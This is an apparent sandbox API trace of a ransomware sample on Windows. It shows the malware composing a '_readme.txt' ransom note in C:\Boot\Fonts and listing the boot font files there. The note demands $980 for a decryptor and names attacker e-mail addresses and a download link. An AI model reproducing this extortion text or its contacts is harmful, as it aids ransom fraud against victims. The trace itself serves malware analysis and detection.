Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.604] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.604] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.604] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.604] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.604] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.604] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.604] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.604] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.604] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.604] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.604] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.604] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.604] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.604] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.612] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.612] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.612] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.612] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.612] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.612] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.612] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.612] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.612] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.612] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.612] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.612] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.612] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.612] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.612] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.612] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.612] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.612] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.612] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.612] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.612] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.612] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.612] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.613] PathFindFileNameW (pszPath="C:\\Boot\\Fonts\\") returned="Fonts\\" [0165.613] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.613] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.613] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.613] PathFindFileNameW (pszPath="") returned="" [0165.613] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.614] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.614] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.614] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.614] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.614] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.614] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.614] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.614] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x81c) returned 0x3b19ec8 [0165.614] PathAppendW (in: pszPath="C:\\Boot\\Fonts\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 1 [0165.614] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.614] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.614] PathFileExistsW (pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 0 [0165.615] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b44e70 [0165.615] lstrcpyW (in: lpString1=0x3b44e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.615] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.615] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.615] CreateFileW (lpFileName="C:\\Boot\\Fonts\\_readme.txt" (normalized: "c:\\boot\\fonts\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.615] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.615] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e70 | out: hHeap=0xcd0000) returned 1 [0165.615] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.615] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.615] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.616] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.616] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.616] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0165.616] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0165.616] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0165.616] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0165.616] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0165.616] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0165.616] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.616] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.616] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c200 | out: hHeap=0xcd0000) returned 1 [0165.616] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c200 [0165.616] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.616] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.616] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.616] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.616] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.616] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.616] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.616] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.616] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.616] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.616] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.616] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.616] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.616] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.616] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.616] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.616] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.617] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.617] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.617] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.617] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.617] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.617] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.617] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.617] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.617] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.617] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.617] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.617] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.617] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.617] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.617] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.617] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.617] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.617] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.617] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.617] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.617] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.617] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.617] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.617] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.617] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.617] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.617] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.617] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.617] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.617] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.617] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.617] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.617] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.617] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.617] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.617] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.617] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.617] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.618] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.618] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.618] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.618] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.618] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.618] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.618] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.618] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.618] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.618] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.618] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.618] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.618] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.618] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.618] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.618] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.618] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.618] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.618] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.618] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.618] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.618] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.618] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.618] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.618] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.618] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.618] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.618] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.618] 